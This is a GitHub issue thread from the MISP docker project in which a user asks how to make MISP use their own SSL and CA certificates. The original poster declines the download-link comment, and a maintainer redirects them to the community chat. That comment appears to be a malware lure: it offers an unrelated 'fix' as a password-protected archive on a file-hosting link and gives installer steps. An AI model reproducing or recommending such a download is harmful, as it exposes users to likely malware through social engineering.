### ISSUE TITLE
Creation of CA certificates

### ISSUE THREAD

**Issue by ALERIO2022** [MISP/misp-docker#131]
Can I know how can I implement my own certificates? I have created them, even modifiyng the route where it picks the ssl certificates in misp 443 (it seems to ignore the changes). Am I doing something wrong? I also had added a ca-root and I do not know if it has produced any change. 

If what I do is wrong, what I have to do so when I open the MISP my computer trust the certificates?

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ALERIO2022** [comment]
Thanks for it, but I would like to find a method that does not involve install anything in my local computer, only in the container.

**Comment by ostefano** [comment]
That is not an issue with the docker image itself, but rather related to how you can use it.
Please head to to the Gitter/Matrix chan and ask the community for support.
